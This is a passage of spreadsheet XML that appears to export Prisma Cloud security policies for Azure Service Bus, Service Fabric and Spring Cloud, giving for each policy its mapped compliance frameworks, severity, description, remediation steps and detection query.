          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-service-bus-namespace' AND json.rule = properties.status equals "Active" and (properties.disableLocalAuth does not exist or properties.disableLocalAuth is false)</t>
        </is>
      </c>
      <c r="AA2411" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2411" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2411" t="inlineStr">
        <is>
          <t>PC-AZR-ASB-861</t>
        </is>
      </c>
      <c r="AD2411" t="b">
        <v>1</v>
      </c>
      <c r="AE2411" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2411" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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1" t="inlineStr">
        <is>
          <t>a44d5f62-c690-459a-8912-bbad73321d35</t>
        </is>
      </c>
      <c r="AI2411" t="inlineStr">
        <is>
          <t>f7ca30fc-d990-4fef-b14d-3cc253d95722</t>
        </is>
      </c>
      <c r="AJ2411" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2411" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2412">
      <c r="A2412" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27001:2022, ISO 27002:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HIPAA, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, GDPR, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CIS Controls v8, MLPS 2.0 (Level 2), Copy of New Zealand Information Security Manual (NZISM v3.4), SOC 2, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, HIPAA, Secure Controls Framework (SCF) - 2024.2, HIPAA, ITSG-33, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, kfirdaus AWS Account-CS, CIS Controls v7.1, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2412" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2412" s="2" t="inlineStr"/>
      <c r="D2412" t="inlineStr"/>
      <c r="E2412" t="inlineStr"/>
      <c r="F2412" t="inlineStr"/>
      <c r="G2412" t="b">
        <v>1</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2412" t="inlineStr">
        <is>
          <t>azure-service-bus</t>
        </is>
      </c>
      <c r="K2412" t="inlineStr">
        <is>
          <t>Azure Service bus namespace configured with overly permissive authorization rules</t>
        </is>
      </c>
      <c r="L2412" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2412" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2412" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2412" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2412" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2412" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2412" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2412" t="inlineStr"/>
      <c r="T2412" t="b">
        <v>0</v>
      </c>
      <c r="U2412" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2412" t="inlineStr">
        <is>
          <t>azure-service-bus-namespace</t>
        </is>
      </c>
      <c r="W2412" t="inlineStr">
        <is>
          <t>This policy identifies Azure Service bus namespaces configured with overly permissive authorization rules. Service Bus clients should not use a namespace level access policy that provides access to all queues and topics in a namespace. It is recommended to follow the least privileged security model, should create access policies at the entity level for queues and topics to provide access to only the specific entity. All authorization rules except RootManageSharedAccessKey should be removed from the Service bus namespace.</t>
        </is>
      </c>
      <c r="X2412" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Go to Service Bus
3. Select the reported Service bus namespace
4. Click on 'Shared access policies' under 'Settings'
5. Select and remove all authorization rules except RootManageSharedAccessKey.</t>
        </is>
      </c>
      <c r="Y2412" t="inlineStr"/>
      <c r="Z2412" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-service-bus-namespace' AND json.rule = authorizationRules[*] size greater than 1 and authorizationRules[?any(name does not equal RootManageSharedAccessKey and properties.rights contains Manage)] exists</t>
        </is>
      </c>
      <c r="AA2412" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2412" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2412" t="inlineStr">
        <is>
          <t>PC-AZR-ASB-815</t>
        </is>
      </c>
      <c r="AD2412" t="b">
        <v>1</v>
      </c>
      <c r="AE2412" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2412" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>5fdb1705-c24f-49d0-ac80-ad435ee6d477</t>
        </is>
      </c>
      <c r="AI2412" t="inlineStr">
        <is>
          <t>3562876e-1b11-43f0-8b4f-8c088fbf3afb</t>
        </is>
      </c>
      <c r="AJ2412" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2412" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2413">
      <c r="A2413" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HIPAA, New Zealand Information Security Manual (NZISM v3.4), New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27001:2022, NIST 800-53 Rev 5, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, CIS Controls v8.1, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, HIPAA, CIS Controls v7.1, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, CIS Controls v7.1, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, TX-RAMP Level 2, MLPS 2.0 (Level 2), Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27001:2022, PCI DSS v4.0, SOC 2, SOC 2, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Copy of CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, Copy of ACSC Information Security Manual (ISM)-clone, FFIEC, ITSG-33, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2413" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2413" s="2" t="inlineStr"/>
      <c r="D2413" t="inlineStr"/>
      <c r="E2413" t="inlineStr"/>
      <c r="F2413" t="inlineStr"/>
      <c r="G2413" t="b">
        <v>1</v>
      </c>
      <c r="H24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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2413" t="inlineStr">
        <is>
          <t>azure-service-bus</t>
        </is>
      </c>
      <c r="K2413" t="inlineStr">
        <is>
          <t>Azure Service bus namespace configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2413" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2413" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2413" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2413" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2413" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2413" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2413" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2413" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2413" t="b">
        <v>0</v>
      </c>
      <c r="U2413" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2413" t="inlineStr">
        <is>
          <t>azure-service-bus-namespace</t>
        </is>
      </c>
      <c r="W2413" t="inlineStr">
        <is>
          <t>This policy identifies Azure Service bus namespaces configured with overly permissive network access. By default, Service Bus namespaces are accessible from the internet as long as the request comes with valid authentication and authorization. With an IP firewall, you can restrict it further to only a set of IPv4 addresses or IPv4 address ranges. With Virtual Networks, the network traffic path is secured on both ends. It is recommended to configure the Service bus namespace with an IP firewall or by Virtual Network; so that the Service bus namespace is accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2413" t="inlineStr">
        <is>
          <t>To restrict Service bus namespace access to only a set of IPv4 addresses or IPv4 address ranges; follow below URL:
https://docs.microsoft.com/en-us/azure/service-bus-messaging/service-bus-ip-filtering
To restrict Service bus namespace access with a virtual network; follow below URL:
https://docs.microsoft.com/en-us/azure/service-bus-messaging/service-bus-service-endpoints</t>
        </is>
      </c>
      <c r="Y2413" t="inlineStr"/>
      <c r="Z2413" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-service-bus-namespace' AND json.rule = sku.tier equals "Premium" and properties.status equals "Active" and networkRuleSets[*].properties.defaultAction equals "Allow" and networkRuleSets[*].properties.publicNetworkAccess equals Enabled</t>
        </is>
      </c>
      <c r="AA2413" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2413" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2413" t="inlineStr">
        <is>
          <t>PC-AZR-ASB-812</t>
        </is>
      </c>
      <c r="AD2413" t="b">
        <v>1</v>
      </c>
      <c r="AE2413" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2413" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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3" t="inlineStr">
        <is>
          <t>28344016-0ed9-4d1c-9314-11c9d5099697</t>
        </is>
      </c>
      <c r="AI2413" t="inlineStr">
        <is>
          <t>afce8977-e903-4791-ae09-6df110bf4521</t>
        </is>
      </c>
      <c r="AJ2413" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2413" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2414">
      <c r="A2414" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, SOC 2, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2414" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2414" s="2" t="inlineStr"/>
      <c r="D2414" t="inlineStr"/>
      <c r="E2414" t="inlineStr"/>
      <c r="F2414" t="inlineStr"/>
      <c r="G2414" t="b">
        <v>1</v>
      </c>
      <c r="H24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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2414" t="inlineStr">
        <is>
          <t>azure-service-fabric</t>
        </is>
      </c>
      <c r="K2414" t="inlineStr">
        <is>
          <t>Azure Service Fabric cluster not configured with cluster protection level security</t>
        </is>
      </c>
      <c r="L2414" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2414" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2414" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2414" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2414" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2414" t="inlineStr">
        <is>
          <t>IPY</t>
        </is>
      </c>
      <c r="R2414" t="inlineStr">
        <is>
          <t>IPY-03</t>
        </is>
      </c>
      <c r="S2414" t="inlineStr"/>
      <c r="T2414" t="b">
        <v>0</v>
      </c>
      <c r="U2414" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2414" t="inlineStr">
        <is>
          <t>azure-service-fabric-cluster</t>
        </is>
      </c>
      <c r="W2414" t="inlineStr">
        <is>
          <t>This policy identifies Service Fabric clusters that are not configured with cluster protection level security. Service Fabric provides levels of protection for node-to-node communication using a primary cluster certificate. It is recommended to set the protection level to ensure that all node-to-node messages are encrypted and digitally signed.</t>
        </is>
      </c>
      <c r="X2414" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to 'Service Fabric cluster'
3. Click on the reported Service Fabric cluster
4. Select 'Custom fabric settings' under 'Settings' from left panel 
5. Make sure a fabric settings in 'Security' section exist with 'ClusterProtectionLevel' property is set to 'EncryptAndSign'.
Note: Service Fabric provides three levels of protection (None, Sign and EncryptAndSign) for node-to-node communication using a primary cluster certificate. Set the protection level to ensure that all node-to-node messages are encrypted and digitally signed. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available</t>
        </is>
      </c>
      <c r="Y2414" t="inlineStr"/>
      <c r="Z2414" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-service-fabric-cluster' AND json.rule = properties.provisioningState equal ignore case Succeeded and ((properties.fabricSettings[*].name does not equal ignore case "Security" or properties.fabricSettings[*].parameters[*].name does not equal ignore case "ClusterProtectionLevel") or (properties.fabricSettings[?any(name equal ignore case "Security" and parameters[?any(name equal ignore case "ClusterProtectionLevel" and value equal ignore case "None")] exists )] exists))
{"category":"General","resourceTypes":["azurerm_service_fabric_cluster"]}</t>
        </is>
      </c>
      <c r="AA2414" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2414" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2414" t="inlineStr">
        <is>
          <t>PC-AZR-ASF-926-CKV_AZURE_125</t>
        </is>
      </c>
      <c r="AD2414" t="b">
        <v>1</v>
      </c>
      <c r="AE2414" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2414" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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4" t="inlineStr">
        <is>
          <t>11c073b9-2d09-49f9-9bc0-0d710e7ce1ef</t>
        </is>
      </c>
      <c r="AI2414" t="inlineStr">
        <is>
          <t>0829d935-1c76-4f15-99f3-79addd6b7742</t>
        </is>
      </c>
      <c r="AJ2414" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2414" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2415">
      <c r="A2415" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, CRI Profile v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, New Zealand Information Security Manual (NZISM v3.4), Insurance Regulatory And Development Authority Of India, ACSC Information Security Manual (ISM), PCI DSS v4.0, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v7.1, CRI Profile v1.2.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO 27002:2022, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, kfirdaus AWS Account-CS, Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2415" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2415" s="2" t="inlineStr"/>
      <c r="D2415" t="inlineStr"/>
      <c r="E2415" t="inlineStr"/>
      <c r="F2415" t="inlineStr"/>
      <c r="G2415" t="b">
        <v>1</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2415" t="inlineStr">
        <is>
          <t>azure-spring-cloud</t>
        </is>
      </c>
      <c r="K2415" t="inlineStr">
        <is>
          <t>Azure Spring Cloud app end-to-end TLS is disabled</t>
        </is>
      </c>
      <c r="L2415" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2415" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2415" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2415" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2415" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2415" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2415" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2415" t="inlineStr"/>
      <c r="T2415" t="b">
        <v>0</v>
      </c>
      <c r="U2415" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2415" t="inlineStr">
        <is>
          <t>azure-spring-cloud-service</t>
        </is>
      </c>
      <c r="W2415" t="inlineStr">
        <is>
          <t>This policy identifies Azure Spring Cloud apps in which end-to-end TLS is disabled. Enabling end-to-end TLS/SSL will secure traffic from ingress controller to apps. After you enable end-to-end TLS and load a cert from the key vault, all communications within Azure Spring Cloud are secured with TLS. As a security best practice, it is recommended to have an end-to-end TLS to secure Spring Cloud apps traffic.</t>
        </is>
      </c>
      <c r="X2415" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Azure Spring Cloud dashboard
3. Choose Azure Spring Cloud service for which Azure Spring Cloud app is reported
4. Under the 'Settings', click on 'Apps'
5. Click on reported Azure Spring Cloud app
6. Under the 'Settings', click on 'Ingress-to-app TLS'
7. Set 'Yes' to 'Ingress-to-app TLS'</t>
        </is>
      </c>
      <c r="Y2415" t="inlineStr"/>
      <c r="Z2415" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-spring-cloud-service' AND json.rule = properties.powerState equals Running and sku.tier does not equal Basic as X; config from cloud.resource where api.name = 'azure-spring-cloud-app' AND json.rule = properties.provisioningState equals Succeeded and properties.enableEndToEndTLS is false as Y; filter '$.X.name equals $.Y.serviceName'; show Y;</t>
        </is>
      </c>
      <c r="AA2415" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2415" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2415" t="inlineStr">
        <is>
          <t>PC-AZR-ASC-845</t>
        </is>
      </c>
      <c r="AD2415" t="b">
        <v>1</v>
      </c>
      <c r="AE2415" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2415" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>424a5e77-8997-47d9-b0e0-daaca8b81b01</t>
        </is>
      </c>
      <c r="AI2415" t="inlineStr">
        <is>
          <t>234cc340-0354-499a-b17b-987a3d9fbeb6</t>
        </is>
      </c>
      <c r="AJ2415" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2415" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2416">
      <c r="A2416" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), CIS Controls v8, Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CIS Controls v8.1, CIS Controls v7.1, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2416" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2416" s="2" t="inlineStr"/>
      <c r="D2416" t="inlineStr"/>
      <c r="E2416" t="inlineStr"/>
      <c r="F2416" t="inlineStr"/>
      <c r="G2416" t="b">
        <v>1</v>
      </c>
      <c r="H24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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2416" t="inlineStr">
        <is>
          <t>azure-spring-cloud</t>
        </is>
      </c>
      <c r="K2416" t="inlineStr">
        <is>
          <t>Azure Spring Cloud service is not configured with virtual network</t>
        </is>
      </c>
      <c r="L2416" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2416" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2416" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2416" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2416" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2416" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2416" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2416" t="inlineStr"/>
      <c r="T2416" t="b">
        <v>0</v>
      </c>
      <c r="U2416" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2416" t="inlineStr">
        <is>
          <t>azure-spring-cloud-service</t>
        </is>
      </c>
      <c r="W2416" t="inlineStr">
        <is>
          <t>This policy identifies Azure Spring Cloud services that are not configured with a virtual network. Spring Cloud configured with a virtual network isolates apps and service runtime from the internet on your corporate network and provides control over inbound and outbound network communications for Azure Spring Cloud. As best security practice, It is recommended to deploy Spring Cloud service in a virtual network.</t>
        </is>
      </c>
      <c r="X2416" t="inlineStr">
        <is>
          <t>You can select your Azure virtual network only when you create a new Azure Spring Cloud service instance. You cannot change to use another virtual network after Azure Spring Cloud has been created. 
To resolve this alert create a new Spring Cloud service configuring virtual network, migrate all data to newly created Spring Cloud service and then delete the reported Spring Cloud service.
To create a new Spring Cloud service with virtual network, follow the below URL:
https://docs.microsoft.com/en-us/azure/spring-cloud/how-to-deploy-in-azure-virtual-network?tabs=azure-portal 
NOTE: Azure Virtual network feature is not available to Basic tier Spring Cloud services. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-23
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-23</t>
        </is>
      </c>
      <c r="Y2416" t="inlineStr"/>
      <c r="Z2416" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-spring-cloud-service' AND json.rule = properties.powerState equals Running and sku.tier does not equal Basic and properties.networkProfile.serviceRuntimeSubnetId does not exist
{"category":"Networking","resourceTypes":["azurerm_spring_cloud_service"]}</t>
        </is>
      </c>
      <c r="AA2416" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2416" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2416" t="inlineStr">
        <is>
          <t>PC-AZR-ASC-837-CKV2_AZURE_23</t>
        </is>
      </c>
      <c r="AD2416" t="b">
        <v>1</v>
      </c>
      <c r="AE2416" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2416" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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6" t="inlineStr">
        <is>
          <t>fd46d0ca-5258-48c6-a5a3-758df622f830</t>
        </is>
      </c>
      <c r="AI2416" t="inlineStr">
        <is>
          <t>05128e74-61e1-4e3c-a4e9-83d840efddb1</t>
        </is>
      </c>
      <c r="AJ2416" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2416" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2417">
      <c r="A2417" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-171 Revision 3, ISO/IEC 27001:2022, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CIS Controls v8, MLPS 2.0 (Level 2), ITSG-33, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, Copy of New Zealand Information Security Manual (NZISM v3.4), NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CIS Controls v7.1, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2417" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2417" s="2" t="inlineStr"/>
      <c r="D2417" t="inlineStr"/>
      <c r="E2417" t="inlineStr"/>
      <c r="F2417" t="inlineStr"/>
      <c r="G2417" t="b">
        <v>1</v>
      </c>
      <c r="H24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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2417" t="inlineStr">
        <is>
          <t>azure-spring-cloud</t>
        </is>
      </c>
      <c r="K2417" t="inlineStr">
        <is>
          <t>Azure Spring Cloud App system-assigned managed identity is disabled</t>
        </is>
      </c>
      <c r="L2417" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2417" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2417" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2417" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2417" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2417" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2417" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2417" t="inlineStr"/>
      <c r="T2417" t="b">
        <v>0</v>
      </c>
      <c r="U2417" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2417" t="inlineStr">
        <is>
